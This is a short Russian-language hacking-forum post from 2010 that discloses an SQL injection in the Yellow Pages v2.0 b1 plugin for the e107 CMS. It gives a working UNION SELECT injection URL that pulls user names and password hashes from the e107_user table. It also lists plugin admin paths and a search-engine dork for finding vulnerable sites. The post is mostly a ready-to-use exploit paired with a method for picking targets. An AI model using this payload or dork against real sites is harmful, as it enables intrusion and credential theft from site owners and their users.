14.12.2010, 11:27
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Yellow Pages v2.0 b1
SQL Injection:
/yellowpages.php
Пример:
Код:
http://e107/e107_plugins/yellowpages/yellowpages.php?1.-2%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8,9,10,11,12%20from%20e107_user--
Путь:
http://e107/e107_plugins/yellowpages/admin_menu.php
http://e107/e107_plugins/yellowpages/admin_prefs_90.php
http://e107/e107_plugins/yellowpages/admin_update.php
http://e107/e107_plugins/yellowpages/e_list.php
http://e107/e107_plugins/yellowpages/e_search.php
etc..
Дорк:inurl:e107_plugins/yellowpages/
|
|
|